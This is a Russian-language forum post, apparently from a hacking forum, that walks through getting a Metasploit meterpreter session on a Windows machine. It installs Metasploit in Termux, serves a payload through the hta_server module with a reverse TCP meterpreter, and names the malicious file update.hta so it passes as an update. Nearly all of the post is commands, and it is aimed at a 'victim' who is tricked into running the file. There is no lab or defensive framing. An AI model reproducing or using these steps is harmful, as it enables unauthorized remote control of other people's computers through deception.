Шалом форумчане Хочу рассказать про способ получения сессии meterpreter (кликабельно) через ссылку, что позволит вам творить удивительные вещи. Кому лень по ссылке переходить выше то Meterpreter — инструмент для удаленного управления Спойлер Установка через консоль: pkg update -y && pkg upgrade -y pkg install unstable-repo pkg install x11-repo pkg install metasploit Код pkg update -y && pkg upgrade -y pkg install unstable-repo pkg install x11-repo pkg install metasploit Запускаем metasploit: msfconsole Код msfconsole Теперь нам нужно выбрать эксплоит: use exploit/windows/misc/hta(нижнее подчеркивание)server Код use exploit/windows/misc/hta(нижнее подчеркивание)server Выбираем payload: set PAYLOAD windows/meterpreter/reverse(нижнее подчеркивание)tcp Код set PAYLOAD windows/meterpreter/reverse(нижнее подчеркивание)tcp Выбираем зараженный файл: set URIPATH /update.hta set FILENAME update.hta Код set URIPATH /update.hta set FILENAME update.hta Пишем вот такую команду: set SRVHOST ваш внутренний ip set LHOST ваш внутренний ip Код set SRVHOST ваш внутренний ip set LHOST ваш внутренний ip Осталось только запустить файл: exploit Код exploit После на заражаемом компе вводим ваш внутренний ip. Если жертва подтвердит запуск файла, у вас будет открыта сессия meterpreter Удачи На форуме нету про это так что не пишите что копипаст Источник тг канал - @tg_inc_soft